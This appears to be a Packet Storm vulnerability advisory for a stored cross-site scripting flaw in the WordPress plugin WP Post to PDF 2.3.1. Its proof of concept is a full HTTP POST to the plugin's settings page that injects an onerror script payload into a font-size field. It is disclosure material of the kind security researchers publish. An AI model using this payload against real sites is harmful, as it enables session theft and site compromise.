WordPress Post To PDF 2.3.1 Cross Site Scripting

2014-02-26T00:00:00
ID PACKETSTORM:125432
Type packetstorm
Reporter HauntIT
Modified 2014-02-26T00:00:00

Description

                                        
                                            `# ==============================================================  
# Title ...| XSS in WP Post to PDF  
# Version .| wp-post-to-pdf.2.3.1  
# Date ....| 23.02.2014  
# Found ...| HauntIT Blog  
# Home ....| http://wordpress.org/plugins/  
# ==============================================================  
  
  
# ==============================================================  
# XSS  
---<request>---  
POST /k/wordpress/wp-admin/options.php HTTP/1.1  
Host: 10.149.14.62  
(...)  
Content-Length: 827  
  
option_page=wpptopdf_options&action=update&_wpnonce=578db9a23d&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-post-to-pdf%2Fwp-post-to-pdf.php&wpptopdf%5Bpost%5D=1&wpptopdf%5Bpage%5D=1&wpptopdf%5Binclude%5D=0&wpptopdf%5BexcludeThis%5D=&wpptopdf%5BincludeCache%5D=0&wpptopdf%5BexcludeThisCache%5D=&wpptopdf%5BiconPosition%5D=before&wpptopdf%5BimageIcon%5D=%3Cimg+alt%3D%22Download+PDF%22+src%3D%22http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-content%2Fplugins%2Fwp-post-to-pdf%2Fasset%2Fimages%2Fpdf.png%22%3E&wpptopdf%5BheaderFont%5D=helvetica&wpptopdf%5BheaderFontSize%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&wpptopdf%5BfooterFont%5D=helvetica&wpptopdf%5BfooterFontSize%5D=10&wpptopdf%5BcontentFont%5D=helvetica&wpptopdf%5BcontentFontSize%5D=12&wpptopdf%5Bsubmit%5D=Save+Changes  
---<request>---  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
`